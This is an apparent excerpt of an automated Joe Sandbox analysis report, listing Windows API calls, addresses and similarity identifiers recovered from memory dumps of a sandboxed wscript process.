• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: String$Load$AllocByteCharMultiWide
• String ID:
• API String ID: 1944948655-0
APIs
• GetFileSize.KERNEL32(00589D3D,00000000,00000000,00000000,?,005961DD,00000000,?,?,80000000,00000001,00000000,00000003,08000000,00000000), ref: 0059620F
• CreateFileMappingA.KERNEL32(00589D3D,00000000,00000002,00000000,00000000,00000000), ref: 00596229
• MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,005961DD,00000000,?,?,80000000,00000001,00000000,00000003,08000000,00000000), ref: 0059623C
• GetLastError.KERNEL32(?,005961DD,00000000,?,?,80000000,00000001,00000000,00000003,08000000,00000000,?,00000000,00000000,00000000), ref: 00596249
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: File$CreateErrorLastMappingSizeView
• String ID:
• API String ID: 2735091159-0
APIs
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0058FA70
• MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,00001CFF), ref: 0058FA87
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: MessageMultipleObjectsPeekWait
• String ID:
• API String ID: 3986374578-0
APIs
• GetCurrentThreadId.KERNEL32 ref: 00587041
• CoGetInterfaceAndReleaseStream.OLE32(?,005838D0,?), ref: 0058707B
Strings
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: CurrentInterfaceReleaseStreamThread
• String ID: wscript
• API String ID: 1806872144-434116418
APIs
• CoCreateInstance.OLE32(00583980,00000000,00000017,00583BD0,p4Y,00000000,005810C4,00000001,005810C4,?,005894CB,-00000001,0zX), ref: 00589A0A
Strings
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: CreateInstance
• String ID: p4Y
• API String ID: 542301482-36547557